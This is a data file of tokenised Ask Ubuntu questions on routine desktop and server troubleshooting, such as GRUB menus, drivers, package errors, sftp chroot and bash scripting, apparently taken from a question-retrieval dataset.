300 cp -f ~/.conky-weather-icons/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==5 ' ) .png ~/.cache/weather-5.png } $ { image ~/.cache/weather-5.png -p 501,320 -s 32x32 } $ { font }
385448	function keys in lubuntu 13.10	i have just installed lubuntu 13.10 saucy salamander but my function keys for media ( such as play pause etc . ) are not working . i can change brightness and volume with the function keys and i am certainly sure that my function keys were working with ubuntu 13.04 . i am currently using hp-mini . thank you for your answers in advance .
385451	ubuntu on laptop - advice	i need some general pointers about installing ubuntu on a new laptop which is not one of the certified-by-ubuntu ones . are there any hardware/bios/manufacturers to stay clear of , or will ubuntu install on pretty much all laptops these days ? thanks
385452	how to change default `` categories '' and `` sources '' in unity dash ?	so i have started using the dash recently . what i want is to set the default `` categories '' ( applications , social , weather ... ) because now , if i want to search for a fb pic or an update , i have to manually click on `` social '' on the right side of the dash . right now , depending on my search , either applications , weather or reference show automatically , but not social for example . i want to manually set the default `` categories '' i want the dash to use when i search for something without the need of clicking on the right side . the same thing happens with the `` sources '' , under `` categories '' . i want wikipedia , facebook and some others to appear by default but i have to search through all of the sources list and manually click on them , which takes some time . so , is there a way to choose the default categories and sources for the dash ?
385455	grep multiple files into one set of data	lets say i have few files which have structure like file1.txt apple fruit tomato vegetable file2.txt apple red green tomato green yellow is there a way to grep at once these 2 files ( or more ) to receive set of data like this one ( or similar ) apple fruit red green tomato vegetable green yellow
385461	how to fix glade opening but closing quickly ?	i 'm using quickly , and when i try to open glade using quickly design , the window appears for a moment then closes right away . how can i fix this ?
385462	chrooting to a mounted usb stick using sftp	i would like to use sftp over openssh as a small ftp server . however i would like to use a mounted hard drive or usb stick as the chrooted directory for the user . as far as i see , chrooting is achieved through an entry like this in /etc/ssh/sshd_config subsystem sftp internal-sftp match group sftp chrootdirectory % h forcecommand internal-sftp allowtcpforwarding no but i would like to replace the chrootdirectory % h through something like chrootdirectory /media/user/usb-stick . this does not seem to work as of right now and i think this is due to the fact that the access rights are not correct . everey auto mounted device has read and write access only for the currently logged in user . how can i change this ?
385463	will a netbook have sufficient specs for ubuntu touch development ?	i 'm interested in getting a cheap but good quality laptop to use among other things , for ubuntu touch development . i see the asus 1015e listed on the ubuntu website , so i know it is compatible with ubuntu , and it is quite cheap . my question is , will a laptop/netbook with those specs , listed below , be sufficient for ubuntu touch development ( compiling - cpu speed , the amount of ram , etc ) : intel celeron 847 1.1 ghz 2 gb ddr3 320 gb 5400 rpm hard drive 10.1-inch screen
385468	ubuntu : files deleted abruptly . hdd space is still full . ubuntu 13.04	somedays ago i was trying to open some file . it shown some error like 'ca n't read the file ' . i ignored this completely . then today to see what has happened i restarted my system . to my astonishment all the files in the downloads files were deleted . then naturally i checked for the hdd space and it shown some 5 gb space which was before when all the files were not deleted . now it showing no space at all . what 's happening with the system . i use ubuntu 13.04 . +edit i run the 'df ' command on my system , i am getting the following output . filesystem inodes iused ifree iuse % mounted on /dev/sda1 12214272 2796567 9417705 23 % / none 203003 1 203002 1 % /sys/fs/cgroup udev 198884 529 198355 1 % /dev tmpfs 203003 536 202467 1 % /run none 203003 6 202997 1 % /run/lock none 203003 30 202973 1 % /run/shm none 203003 28 202975 1 % /run/user /dev/sda8 27492352 642 27491710 1 % /media/cvit/ae48a349-76aa-44ab-b02b-ac75e34a2282 thanks for any kind of suggestion . i need it fast .
385473	launch icons : how do i get rid of them ?	after browsing a commercial site www.kohls.com i suddenly got some `` launch icons '' in my bottom bar towards the right side . they automatically go to pages on kohl 's website . i can not get rid of them - tried everything , including even uninstalling and reinstalling firefox . this has never happened on other websites . could kohl 's website be installing malware ? in any case , how do i get rid of them , short of a complete ubuntu reinstall ? i am using ubuntu 12.04 , correctly updated , but with gnome gui instead of `` unity '' which i do not like at all . screenshot at : http : //i.imgur.com/ijavoie.png ? 1
385474	i 've been getting this error a lot need help please	i 've been using ubuntu 12.04 lts for about 6 months now . i ca n't seem to troubleshoot this error i get when i do updates or install programs . setting up linux-image-3.5.0-43-generic ( 3.5.0-43.66~precise1 ) ... internal error : could not find image ( /boot/vmlinuz-3.5.0-43-generic ) dpkg : error processing linux-image-3.5.0-43-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic-lts- quantal : linux-image-generic-lts-quantal depends on linux-image-3.5.0-43-generic ; however : package linux-image-3.5.0-43-generic is not configured yet . dpkg : error processing linux-image-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error rom a previous failure . errors were encountered while processing : linux-image-3.5.0-43-generic linux-image-generic-lts-quantal e : sub-process /usr/bin/dpkg returned an error code ( 1 )
385478	increasing the onboard graphic memory card for intel-gm45 series	recently i have upgraded my ram modules to 2*4gb 800 mhz dual-channels . i have 10gb swap space as well in my ubuntu 12.04 . kinda weird that i do n't have the options for manipulating the onboard graphic card on the bios ( inspiron-1545 , bios ver . a14 ) . still written 32 mb in bios after changing my ram modules . now i have 256m as aperture , any idea how to increase that manually to have better performance on hd videos ? and someone please explain the differences between this 32mb of bios and 256mb of aperture . here are some info of my system and the graphic card benchmark : ======================================================= glmark2 2011.09 ======================================================= opengl information gl_vendor : intel open source technology center gl_renderer : mesa dri mobile intel速 gm45 express chipset gl_version : 2.1 mesa 9.1.7 ======================================================= [ build ] use-vbo=false : fps : 300 [ build ] use-vbo=true : fps : 325 [ texture ] texture-filter=nearest : fps : 374 [ texture ] texture-filter=linear : fps : 375 [ texture ] texture-filter=mipmap : fps : 410 [ shading ] shading=gouraud : fps : 250 [ shading ] shading=blinn-phong-inf : fps : 260 [ shading ] shading=phong : fps : 222 [ bump ] bump-render=high-poly : fps : 156 [ bump ] bump-render=normals : fps : 353 [ effect2d ] kernel=0,1,0 ; 1 , -4,1 ; 0,1,0 ; : fps : 145 [ effect2d ] kernel=1,1,1,1,1 ; 1,1,1,1,1 ; 1,1,1,1,1 ; : fps : 72 [ pulsar ] light=false : quads=5 : texture=false : fps : 300 [ desktop ] blur-radius=5 : effect=blur : passes=1 : separable=true : windows=4 : fps : 74 [ conditionals ] fragment-steps=0 : vertex-steps=0 : fps : 327 [ conditionals ] fragment-steps=5 : vertex-steps=0 : fps : 268 [ conditionals ] fragment-steps=0 : vertex-steps=5 : fps : 327 [ function ] fragment-complexity=low : fragment-steps=5 : fps : 324 [ function ] fragment-complexity=medium : fragment-steps=5 : fps : 242 [ loop ] fragment-loop=false : fragment-steps=5 : vertex-steps=5 : fps : 315 [ loop ] fragment-steps=5 : fragment-uniform=false : vertex-steps=5 : fps : 315 [ loop ] fragment-steps=5 : fragment-uniform=true : vertex-steps=5 : fps : 226 ======================================================= glmark2 score : 270 ======================================================= graphic card info : [ 0.000000 ] no agp bridge found [ 0.000000 ] no agp bridge found [ 0.718565 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xe0000000
385479	having problem displaying date ?	i want to display following line : current date is : 2013/12/03 current time is : 08:50 pm what i have done is : echo `` current date is : '' date + % d echo `` current time is : '' date + % r but i have not been able to get the answer . so will you please help me .
385480	how to sort files inside a directory via terminal ?	i want to sort subdirectories inside a main directory according to the size , and also i want to sort files inside the subdirectories according to the file created date through terminal . is that possible ? edit : after i sorted the files inside the folder by following the below answers , it does n't rearranges while i am viewing through nautilus . i want the files to be rearranged while viewing it through nautilus .
385483	problems after installation in a windows 8 preinstalled computer	when i am installing ubuntu 13.10 it did not find any operating system in my computer , so i did the installation using something else by creating ( ext4 \ for 30gb ) , ( ext4 \boot for 200mb ) and ( swap area for 3gb ) . it worked properly twice , until i boot windows 8 again . after booting windows 8 once i cant find a menu giving options to choose operating system . it simply starts running windows automatically ! ! i have read many similar questions and the corresponding answers from people in this forum , but till now i have n't found a solution . could someone help me on this subject ? thanks in advance ! specifications - vaio e series , 4gb ram , intel i3 , 500gb hdd .
385485	increase icon/font size in ubuntu 13.10 on some specific locations	i 've just installed ubuntu 13.10 . i could increase the font size in most places using the tweak tool , however i 'm not able to increase it in some specific places ( e.g. , tab names in chrome , text in gnome-do ) . i 'm also not able to increase the icons size in e.g . the top right panel ( e.g. , dropbox icon , battery life icon ) . many thanks ,
385486	how to open grub 2 terminal in ubuntu 13.04 after completely booting/logging ?	i want to test commands on grub 2 terminal but i do n't know how to open grub 2 terminal . i know one way is at the time of booting when grub menu appears , i can press 'c ' and enter grub 2 terminal . but i would like to know how can i open the terminal after i have logged into my system ? one can enter grub legacy terminal by running command grub from command line but how to open grub 2 terminal ?
385493	ubuntu error occured and i need some help	when i installed ubuntu a while ago , i got an error saying that my hardware has an error . after that , it restarted and after that my ubuntu got destroyed . so i have to reformat it again in windows 7 . i need some help here ! ! please
385495	is there a way to join multiple nautilus windows into one window with different tabs ?	many times i end up with many nautilus windows open . i would like to reduce clutter by joining them into one window with different tabs . is there a ( n easy ) way ?
385497	how to mount ubuntu on ntfs ?	i have ntfs on which windows 7 is installed . when i m trying to install ubuntu , during partition i m getting this message file system type ntfs can not be mounted on /home because it is not fully functional unix file system . when i chose ext2 or ext3 i ca n't evade formatting ? what should i do ?
385505	unable to change launcher/dock icon size in 12.04	i can not change the launcher icon size by sliding the bar in appearance window . the slider does not have any effect . also the autohide also does not have any effect on the launcher . for guest user everything works fine but not for my user . i used compiz settings manager . there i can change the icon size but there i can not see the sliders to adjust but only numeric values . earlier top panels for windows were also not showing up but i corrected them using compiz . p.s earlier i messed my /etc folder permissions but that i managed to correct . but now the ui is creating a problem for me . kindly advise . thanks !
385506	wireless driver trouble	ok so for certain reasons i do n't want to install ubuntu 13.10 i want 13.04 . i am trying to install on a partition on a mac book pro retina 10.2 . i am getting really frustrated because my wireless is not working and i can not plug it into a wired connection . i have an install that is working from usb and i can hit the use broadcom driver in the alternate driver option menu when i boot from the usb but when i try to do this on the install on the internal hd it wo n't let me do it . and if i click it on and try to restart the computer rather than hit apply changes i can then not boot into ubuntu at all . what should i try now ? i have tried things like $ sudo modprobe b43 and $ sudo modprobe wl the first does n't seem to do anything and the second gives me a fatal : wl module not found . i feel like i am so close to making the wireless work but something is missing .
385515	can not install shutter due to libxml-simple-perl	i can not install shutter : $ sudo apt-get install -f shutter reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : shutter : depends : libxml-simple-perl but it is not going to be installed e : unable to correct problems , you have held broken packages . $ sudo apt-get install -f libxml-simple-perl reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libxml-simple-perl : depends : libxml-sax-perl but it is not going to be installed depends : libxml-libxml-perl but it is not going to be installed or libxml-sax-expat-perl but it is not going to be installed e : unable to correct problems , you have held broken packages . ubuntu version is 12.04 lts - `` wubuntu '' standard install . i have not added any other repositories . running : apt-cache policy shutter libxml-simple-perl libxml-sax-perl libxml-libxml-perl libxml-sax-expat-perl results in : installed : ( none ) and 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages for each of those packages . what to do next ?
385520	software center prompts password of another user	i have a krb5-ldap user in an `` administrators '' which is added to sudoers list as follows : % administrators all= ( all ) all now that works fine for all sudo operations . but when that user wants to install something in the ubuntu software center , he gets prompted for the password of a local `` admin '' user . i have no idea why it would behave that way . how can i fix this ? update also tried to add these users to the sudo groups with pam-groups in /etc/security/group.conf : * ; * ; % administrators ; al0000-2400 ; sudo the sudo group now shows up correctly in groups , however the software center still asks for the password for another , local user .
385524	ca n't find spyder or ipython notebook applications after anaconda install ( xubuntu 13.10 )	i installed anaconda 2.7 . i can run spyder and ipython notebook from the terminal but i ca n't find the applications at all from the desktop . is there a specific place i should look ? should i just reinstall ? i know they are there as they run from the terminal but i want to be able to put them on the desktop as well .
385525	how do i install a huawei e3256 dongle to my ubuntu gnome computer ? i am a new user . it just says no software in autorun	i am completely stuck and still trying to find my way round ubuntu . should i update to 12.04.3 now that is offered under updates ? .how do i find out which programme i have on ubuntu now ? . ihave plugged in the 3 huawei e3256 dc-hspa dongle but can get no further than no software for autorun . how do i install this dongle ?
385527	x11vnc server - creating multiple zombie processes - how do i stop it ?	recently started using x11vnc server on ubuntu ( 10.04 ) for remote access over internet from win $ pc using ssl/ssh vnc viewer . thought i had it config 'd ok then noticed many zombie processes for x11vnc , like 20+ in sys monitor sometimes . i 'm using terminal cmd : x11vnc -rfbversion 3.6 -rfbport 5900 -rfbauth /home/xxxx/.vnc/passwd -forever -bg -gui tray to start it . how can i stop/avoid it creating the zombies every connect/disconnect ?
385528	how to increment a variable in bash ?	how to increment a numeric variable in bash ? i tried with var= $ var+1 and var= ( $ var+1 ) but it does n't work . my variable is a number , but bash think that is a string . my bash version is 4.2.45 ( 1 ) -release ( x86_64-pc-linux-gnu ) and i use ubuntu 13.10 .
385530	dell 968 all in one photo printer	can i get ubuntu 12.04 to work with the dell 968 aio printer . i have a customer who wants to use ubuntu . but i cant seem to get a driver . can i use wine and install the windows 7 driver .
385534	what architecture to use in my pc	i 'm new to ubuntu , i have a dell inspiron n4010 with intel core i5 540m 2.5 ghz ( 1st generation ) , 5gb ram . this machine have from factory windows 7 professional x64 . my question is , which is the better ubuntu for my pc ? x64 or x32 . i have read a lot of forum posts but i ca n't decide which is the better one for my pc .
385535	custom keyboard shortcut variation question	i already have a keyboard short-cut that works for tmux i mapped : ctrl+alt+b to the command : gnome-terminal -e tmux but when i open up vim in the tmux session started by this the colors do n't work correctly . i fixed the initial tmux vim colorscheme issue outside by adding the 256 color statement to my .tmux.conf and .bashrc so when i regularly tmux into my terminal and vim it 's fine . so the problems comes in at gnome-terminal -e tmux ? where this somehow disables 256 ? i 've tried gnome-terminal -e tmux -2 for the 256 color flag but this wo n't let the key binding work . is there some other mapping or something or another way to make a keyboard shortcut for tmux that 'll help me with this slight convenience issue ? thanks .
385544	problem with kmail losing e-mails	since i upgraded to 13.04 ( i 'm not at 13.10 ) , i have a very strange problem with kmail version 4.11.2 . i have some local folders in which i classify my e-mails . when i click on any of these folders , i see the list of e-mail headers but the body of some e-mails does n't show . when i scroll , once in a while a body appears , but it stays there as i continue to scroll , until i hit another e-mail that kmail recognizes . on an e-mail that does n't show the body , if i try a forward or reply , i get the message : please wait while the message is transferred which stays until i click cancel . if i try to copy the e-mail to another folder , it says : unable to retrieve item from resource : invalid item retrieved in ~/.local/share/local-mail , only one of my local folders show as directory ( with directories new , cur and tmp under it ) . unluckily , this folder contains only one e-mail , which i can indeed read . but even in the local folders not showing as a directory , i can read a few e-mails . could if be a problem of akonadi data corruption ? how should i fix it ?
385545	use of 802.1x security option in network ?	i was passing through network settings and noticed this option 802.1x security for this connection ? available to tick . i did never pay any attention to this option untill now , i just want to know what does this option exactly stands for ? security against what/for what ? i got wired connection and wonder do i really need to activate it and if so then why ? just in short help would be appreciated , because i was googling and i did n't find exact answer to my question .
385548	on second screen ( tv ) mouse is `` slow/sluggish ''	i am running a dell 30 '' monitor and a hd-tv on the same graphic card . so far everything runs fine , but working on the tv is somehow sluggish . when i move the mouse there is a very small delay . it is annoying when you are moving the mouse . the tv is connected by hdmi cable . the hdmi cable is about 5 meters long . my mouse and keyboard are connected by logitech unifying receiver ( second table is about 5 meters away ) when i start my catalyst control center it says 1920x1080 at 75hz . this is my graphic card 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cedar [ radeon hd 5000/6000/7350 series ] ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 3000 flags : bus master , fast devsel , latency 0 , irq 75 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fbe20000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at e000 [ size=256 ] expansion rom at fbe00000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express legacy endpoint , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 < ? > capabilities : [ 150 ] advanced error reporting kernel driver in use : fglrx_pci is it usual behaviour that the mouse movement is slow ? or can i fix it ? is it a problem with my display , cable , distance , unifying thing ?
385549	how to install network drivers	i dual boot windows and ubuntu 12.04 on my laptop . turns out i installed ubuntu while not connected to the internet and now it semes like there are no network drivers ... no wi-fi networks are identified . how do i fix this ?
385552	can i make dual boot system	sir/madam , i want to ask about installation of ubuntu . and can i make my pc dual boot with windows 7 and ubuntu .
385553	debugging kgpe-d16 unable to load ubuntu without acpi=off	i have an asus kgpe-d16 with the latest bios ( 3201 ) and dual opteron 6376 chips . i can not begin the ubuntu 12.04 installation process without disabling acpi completely ( intermediate activation attempts as outlined in https : //wiki.ubuntu.com/debuggingacpi also fail ) . the problem manifests as this : when i choose to install ubuntu , it almost automatically reboots . i 've checked acpi tables with fwts ( they seem okay ) , the cpu 's appear to be recognized properly when the kernel loads so i do not believe it is an issue related to amd 's powernow-k8 driver ( asus 's suggestion ) . i would welcome any suggestions ; unfortunately , the reboot happens even before any grub output is produced ( i turned on the verbose option ) . can anyone suggest more extreme debugging options , if not a solution ? before i spin my wheels any harder on this problem , does acpi=off effect any computational disadvantages ( we have 2-cpus for 32 cores , which we plan to use to the hilt ) ? i read in a different thread that this flag only turns acpi off during the boot process ; does this mean it is turned on after boot . is that even possible ?
385555	can i set grub to not boot a default os ?	i 'd like the computer to wait at the grub screen for me to make a choice , rather than picking one option and running with it . is there a way to have no default operating system in grub ?
385558	i 've deleted wired connection 1	i 've deleted wired connection 1 . how to set up new wired connection 1 ?
385559	screen brightness regulation after hibernation 13.10	i 'm new to ubuntu 13.10 and pretty much satisfied with it . my first problem was that there was no brightness regulation at all , then i added the line '' grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' '' and the brightness regulation even over the fn keys worked . now , if the notebook ( toshiba satellite 930-12z ) wakes up from standby , the brightness control does n't work . i always have to do a full reboot . i already tried some variations of the grub line above but nothing worked . what to try ?
385564	acer e1-470 new partition created ca n't be use	i ca n't use the new partition . i was using gpar to shrink and make a new partition . why i ca n't use the new partition . if i just open it will be just empty folder .
385568	windows vista and ubuntu 12.04lts	i currently have a pc with a beautifully running windows vista os on my 320g hard drive and have ubuntu 12.04lts on a 160g hard drive . both os 's work perfectly ! when i want to run ubuntu i go to my pc 's bios and change the boot sequence for the hard drives depending on what os i want to load . is there a way of creating a boot menu when i turn on the computer now with two already installed perfectly working os 's ? when i installed 12.04lts i thought this is what would of happened automatically . if not it 's okay i 'll stick to it this way . do n't want to damage anything .
385569	why do n't any of the quake engines from the repo work ?	i have the quake shareware installed using dosbox . > tree . ├── deice.exe ├── install.bat ├── quake_sw │ ├── cwsdpmi.exe │ ├── genvxd.dll │ ├── help.txt │ ├── id1 │ │ └── pak0.pak │ ├── licinfo.txt │ ├── mgenvxd.vxd │ ├── order.txt │ ├── pdipx.com │ ├── q95.bat │ ├── qlaunch.exe │ ├── quake.exe │ ├── quakeudp.dll │ ├── readme.txt │ ├── readv106.txt │ ├── resource.exe │ ├── slicnse.txt │ └── techinfo.txt ├── resource.1 └── resource.dat i tried quakespasm -basedir . quakespasm -basedir quake_sw quakespasm -basedir quake_sw/id1 quakespasm -basedir quake_sw/id1/pak0.pak all of these give an error : error-out begin quake error : w_loadwadfile : could n't load gfx.wad i also tried darkplaces -basedir . darkplaces -basedir quake_sw ... which goes fullscreen which is promising , but gives an error message saying that i should pass the path to game files as cli arg . i tried them without -basedir too . i also tried pointing them to the zipped shareware , also nothing . just before you mention it , game-data-packager does not work either . however , dosbox quake_sw/quake.exe does work fine .
385572	can i retrieve data from a hd while running ubuntu from a usb drive ?	i 'm having the same problem as this one - can i retrieve data from a hard drive running ubuntu from a usb drive ? but ... unfortunately when using ubuntu from the usb drive , i can see the hd but ca n't access it , i 'm getting an error message . i should mention that the problem may have been caused by either of the two possibilities : a ) trying to install ubuntu , and aborting when the setup warned me that it must delete the windows folder . b ) scanning the hd using the ubuntu disk tool ( i initially used ubuntu when i suspected my hd is problematic somehow ... ) can anyone help me please ?
385573	i need help in the `` partition disks '' section of the ubuntu server installation	i 've gotten to this point in the installation and i 'm stuck ... will my other os be erased if i select `` guided - use entire disk '' ? if so , are there any options that do n't involve deleting data from my hdd ? what is the recommended disk space for ubuntu server 12.04 lts 32-bit ? on my 120gb hdd , i have what seems to be two partitions currently . # 1 is about 2 gb , # 2 is 118 gb . so , does this mean most of my disk space is used up ?
385574	sound problem in ubuntu 12.04	suddenly there is a sound problem in my ubuntu 12.04lts.the videos and music is playing , but i cant hear any sound.i checked the sound settings , everything is normal.can you help me
385575	video wo n't play correctly	i 'm new to linux and i 've installed ubuntu 12.04 on a dual boot pc . whenever i play something on youtube or iplayer the image is compressed to the left half of the screen and the colours are wrong . the sound works fine . the pc has on board graphics intel速 865g x86/mmx/sse2 and i have updated the drivers and installed ubuntu restricted extras . i 've got flash v 11.2 and the plug-in 's seem to be installed correctly . the problem occurs on both firefox and chrome . i think the problem may be related to flash but i 'm not sure . can anyone advise me on how to fix this ? thanks .
385577	unable to open ubuntu using bootable ubuntu on my pendrive	i am using sony vaio vgn-cr220e and windows vista , i created bootable ubuntu on my kingston 8gb pendrive using universal usb installer setup.i changed boot options i.e enabled external usb drive and changed the usb priority to first and my harddrive to second i boot options . but after restarting i am unable to boot it from pendrive.the cursor is just blinking on the blank screen.unable to see os select options . how can i rectify this ... please help me
385582	rtnetlink answers : no such process and sudo /etc/init.d/networking restart	root @ ip-172-31-15-184 : /etc/network # ifconfig -a eth0 link encap : ethernet hwaddr 0a:8a:00 : ff:98 : d7 inet addr:172.31.15.184 bcast:172.31.15.255 mask:255.255.240.0 inet6 addr : fe80 : :88a : ff : feff:98d7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:80708 errors:0 dropped:0 overruns:0 frame:0 tx packets:16873 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:116767160 ( 116.7 mb ) tx bytes:1297244 ( 1.2 mb ) interrupt:25 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1296 ( 1.2 kb ) tx bytes:1296 ( 1.2 kb ) root @ ip-172-31-15-184 : /etc/network # cat interfaces this file describes the network interfaces available on your system and how to activate them . for more information , see interfaces ( 5 ) . the loopback network interface auto lo iface lo inet loopback the primary network interface # auto eth0 # iface eth0 inet dhcp # for exposing openstack api over the internet auto eth0 iface eth0 inet static address 172.31.15.184 netmask 255.255.240.0 gateway 172.31.15.1 dns-nameservers 8.8.8.8 # not internet connected ( used for openstack management ) auto eth0:1 iface eth0:1 inet static address 10.10.100.51 netmask 255.255.255.0 root @ ip-xxxxxxx : /etc/network # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 172.31.0.1 0.0.0.0 ug 100 0 0 eth0 172.31.0.0 0.0.0.0 255.255.240.0 u 0 0 0 eth0 root @ ip-172-31-15-184 : /etc/network # sudo /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... rtnetlink answers : no such process then it ends abruptly and i have to start my ec2 once again could you please help me
385583	how to restart the wireless with a changed configuration on command line ?	i have a wireless device under the name wlan0 in ubuntu 13.10 . i want to change the configuration of a network to be found in the following directory /etc/networkmanager/system-connections i would like to do the following : stop the wireless connection change the configuration of a network in the mentioned path restart the connection how to do that ? i tried ifdown , but this command tells me that wlan0 is not configured , and i tried nmcli c up/down , but this command does not seem to 'reread ' the changed configuration ? so how to make this work ?
385584	my ubuntu stuck on low resolution	hey there i recently installed ubuntu all great but my graphic card isnt recognize and i 'm stuck on low res' i got an asus laptop with nvidia gt520 cuda what do i need to do ? plllz help i tried different drivers and bumbelee
385585	vim lines get off-by-one	on xubuntu 13.04 , when i execute a vim command command mode , like [ esc ] then : w. i 'll occasionally find that a bunch of gobbly-gook stays in the very last line of the terminal . the text with the results of the command , ie '' test.txt '' 6l , 36c written 6,1 bot will now appear on the second-to-last line of vim instead of the very last line . the problem is , when i 'm returned to insert mode , the display is now one line off from what i 'm editing . this only becomes apparent as i edit each character one-by-one . i 'm not editing what is being displayed , and somehow everything is shifted up one line . so somehow the vim display buffer is getting corrupted , as if the eol i type at the end of the command is not getting dealt with by vim ( or the console ? ) . as if the shell executes the eol to scroll everything up a line when it should n't be , and now vim/the console is in a rather inconsistent state . the only recourse is to restart vim . relevant versions : vim 7.3.547 xfce-terminal 0.6.1
385586	change the output from a background taks to notify-send	recently , i 've started to use karma as my javascript testing service . it works quite good , but everytime the tests are run , the results will be displayed in the terminal that has started the karma runner . i would like to change the output location to the unity notification ( notify-send ) but i do n't know how to do this . also a test like echo 'hi ' > notify-send is not working . thanks for your help in advance .
385590	xfce custom menuelement / menueditor	so i 've installed xubuntu ( my first linux system ; ) ) and i want to add a custom menu to the taskbar . i know that i can add a menu , and change the file that this menu is using , but how do i create such a file ? it would be possible to write one per hand , but i prefer a graphical method , since it 's nicer to use . alacarte was installed , but it was not working properly ( meaning i could n't edit anything or edit another menufile ) . i 've been searching for a couple hours now , and the fix here is not working for me . : ( i hope anyone could help me . launching alacarte after fresh install ( starting , editing works , but can not add stuff ) : ( alacarte:2614 ) : gtk-critical ** : gtk_accel_label_set_accel_closure : assertion 'gtk_accel_group_from_accel_closure ( accel_closure ) ! = null ' failed ( alacarte:2614 ) : gtk-critical ** : gtk_accel_label_set_accel_closure : assertion 'gtk_accel_group_from_accel_closure ( accel_closure ) ! = null ' failed using this patch , i get this ( alacarte does n't start ) : traceback ( most recent call last ) : file `` /usr/bin/alacarte '' , line 23 , in < module > from alacarte.mainwindow import main importerror : can not import name main
385593	no grub menu in 13.10 ?	now that i 've changed to 13.10 , i ca n't get a grub menu . i found this out the hard way when something about installing then removing kde plasma desktop made it so ubuntu stopped booting between the start screen and the login . i had to make a fresh install . now that i have , i 've tried again to get a grub menu . holding down shift does not work . here is what my /etc/defaults/grub file had on fresh install : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' hypothetically , this should make grub menu visible for 10 seconds ( grub_timeout=10 ) . it is not . it also does n't even take 10 seconds for my computer to go from starting grub to the login screen . i tried changing to ... grub_hidden_timeout=5 grub_hidden_timeout_quiet=false grub_timeout=10 ... which did cause a 5 second countdown to be displayed , but hitting shift , once again had no effect . what 's going on ?
385594	wallpaper suddenly went black on ubuntu 13.10	this one is really strange . two days ago the wallpaper on ubuntu 13.10 simply went black . i have repeatedly tried to change it in the appearance menu back to an image , or one of the default wallpapers , but it remains persistently black . i have no clue of what to do . thanks . update i : some things i have tried that did not work : gsettings set org.gnome.settings-daemon.plugins.background active true purging the gnome3 ppa setting the wallpaper with firefox i have desktop icons , thus i do n't think that could be a cause . update ii : i captured a video of this strange desktop behaviour . update iii : other fixes that are reported to work on ubuntu 13.04 , but are unsuccessful on ubuntu 13.10 : resetting configurations unticking the `` show desktop icons '' option ( it does n't exist in ubuntu 13.10 ) unticking `` have file manager handle the desktop '' in gnome tweak tool changing the gtk theme to adwaita update iv : logging in to a gnome flashback session i get the same behaviour with the wallpaper .
385597	how to create a table search in libreoffice calc ?	a lot of our members staff have trouble finding which counties various cities and towns are in . our work involves writing and sending letters , of which the county is a mandatory field . i want to create a table in libreoffice calc that has all the respective counties for each city and town . using the data in this table , i want to be able to create a page where you can simply type the city , press enter and it displays the county that it 's in . maybe even postcode too ? i do n't want to use ctrl +f . is there a way to do it ?
385602	camdesk does n't work	i 'm trying to use camdesk following this omg article , but camdesk is n't working and not sending any error messages . i open it in terminal using : ./camdesk.py a white square appears in the middle of my screen and nothing happens . then i launched it using : python camdesk.py and the same thing happened . a last attempt , i tried : python3 camdesk.py it returned : file `` camdesk.py '' , line 12 if event.keyval == gtk.keysms.escape : ^ taberror : inconsistent use of tabs and spaces in indentation here is a picture of what it looks like , a gray featureless box that has a slight dropshadow : i recorded a video to show the problem . youtube video
385604	i can not gain access to my atitesting.com account	the website states my browser is not supported . the system has detected that your browser/os combination ( /firefox 25.0 ) may not be supported . you will need internet explorer ( at least version 6 ) or firefox ( at least version 3.5 ) or safari ( at least version 3 ) in order to login to the site . see the technical requirements link in the footer for further information . i have firefox and chromium . i need access , please help . next it states that i need silverlight ? ati support says that i can open it with wine . i have wine and it does n't open .
